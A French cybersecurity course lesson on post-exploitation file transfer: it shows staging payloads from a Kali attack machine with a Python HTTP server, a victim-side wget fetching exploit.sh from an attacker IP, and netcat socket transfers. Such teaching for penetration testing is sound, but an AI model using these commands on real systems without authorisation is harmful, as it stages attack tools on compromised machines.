Retour au cours

Techniques de transfert de fichiers (Netcat, Python HTTP Server)

Maîtrise de la Cybersécurité : de Zéro à Héros

Déplacer les outils et payloads

Après avoir obtenu un shell, vous devez souvent transférer des scripts d'exploitation, des outils d'énumération ou des payloads depuis votre machine Kali vers la cible.

1. Utiliser le serveur HTTP de Python

C'est la méthode la plus simple si la cible peut atteindre votre machine sur un port HTTP standard (80 ou 8080).

Sur Kali (Attaque) : Allez dans le répertoire contenant le fichier et lancez :

bash python3 -m http.server 8080

Sur la cible (Victime) : Utilisez un outil comme curl ou wget pour télécharger le fichier :

bash wget http://192.168.1.10:8080/exploit.sh

2. Utiliser Netcat (Le transfert universel)

Netcat peut être utilisé pour envoyer des données directement via un socket réseau.

Kali (Émetteur) : bash cat fichier_a_envoyer | nc -lvnp 4444

Victime (Récepteur) : bash nc 192.168.1.10 4444 > fichier_reçu